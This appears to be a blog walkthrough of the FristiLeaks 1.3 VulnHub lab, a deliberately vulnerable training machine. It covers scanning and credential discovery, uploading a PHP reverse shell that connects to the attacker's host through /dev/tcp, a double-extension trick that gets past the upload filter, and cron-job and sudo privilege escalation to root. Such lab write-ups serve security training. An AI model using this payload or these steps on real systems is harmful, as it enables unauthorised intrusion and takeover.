Open in app

Sign in

Write

Sign in

VulnHub: FRISTILEAKS: 1.3

ratiros01
5 min readApr 1, 2021

https://www.vulnhub.com/entry/fristileaks-13,133/

  1. Network Discovery
nmap -sn 10.0.2.24/24

2.Port scan

nmap -Pn 10.0.2.12

There’s only port 80.

3. OS and service scan

nmap -A -p80 10.0.2.12

4. Vuln scan

nmap --script vuln -p80 10.0.2.12

5. Nikto scan

6. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.12/ -x php,txt,html,sh,cgi

7. Access HTTP site on port 80

View page source

Access robots.txt

Access /cola, /sisi, and /beer. All of them resulted in the same/similar page.

Viewing their page source didn't reveal anything.

Accessing /icons, not much revealed

Accessing /images, not much revealed

After googling, I found that sisi and fristi are also drinks

Let’s try accessing /fristi

There’s a login page

View page source, there’s possible username ‘eezeepz’

Scrolling down to the bottom, I found some comments indicating it’s a base64 string.

Decoding w/ cyberchef, I could not decode it because it is a png image.

I have to use another tool

Convert Base64 to PNG - Online PNG Tools

World's simplest png tool World's simplest online base64 to Portable Network Graphics image converter. Just import your…

onlinepngtools.com

Now I have an image of string.

Try using both of them to login

Login successful

8. Uploading file

I’ll upload the reverse shell script as shell.php

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.24/1234 0>&1'");?>

Prepare listener

rlwrap nc -lvp 1234

Cannot upload shell.php because it’s not an image file.

Change shell.php to shell.jpg

mv shell.php shell.jpg

Upload it

Access the shell.

http://10.0.2.12/fristi/uploads/shell.jpg

Back to the listener, still no shell

Change shell.php to shell.php.jpg

cp shell.php shell.php.jpg

Access it again and now I have the shell.

9. Privilege escalation

Verify user

whoami

List username

cat /etc/passwd

Verify /etc/passwd permission

ls -la /etc/passwd

It belongs to root.

Verify /etc/shadow permission

ls -la /etc/shadow

It belongs to root.

Explore directories in machine

/home, I can access only eezeeps.

There’s notes.txt in /home/eezeepz

Read it

cat notes.txt

From the notes, there’re some programs that store in /home/admin

I will use /home/admin/chmod to create runthis file which will change the permission of /home/admin and store in /tmp.

echo "/home/admin/chmod 777 /home/admin" > /tmp/runthiscd /tmpls -la

Wait for a while and access /home/admin

cd /home/adminls -la

Read cronjob.py

cat crobjob.py

It’s the script that run /tmp/runthis

Read cryptedpass.txt and whoisyourgodnow.txt

cat cryptedpass.txtcat whoisyourgodnow.txt

They look like encoded strings.

Read cryptpass.py. I think it’s an encoding script.

I copy the code and add decode function

def decodeString(str):
    base64string = codecs.decode(str[::-1], 'rot13')
    return base64.b64decode(base64string)

Decode cat cryptedpass.txt and whoisyourgodnow.txt

Use them to login, starting w/ fristigod

su fristigod

Verify sudo

sudo -l

I can run this command w/ fristi.

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bashwhoami

Now, I’m root.

cd /rootls -lacat fristileaks_secrets.txt

--

--

ratiros01

Written by ratiros01

403 Followers

OSCP

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams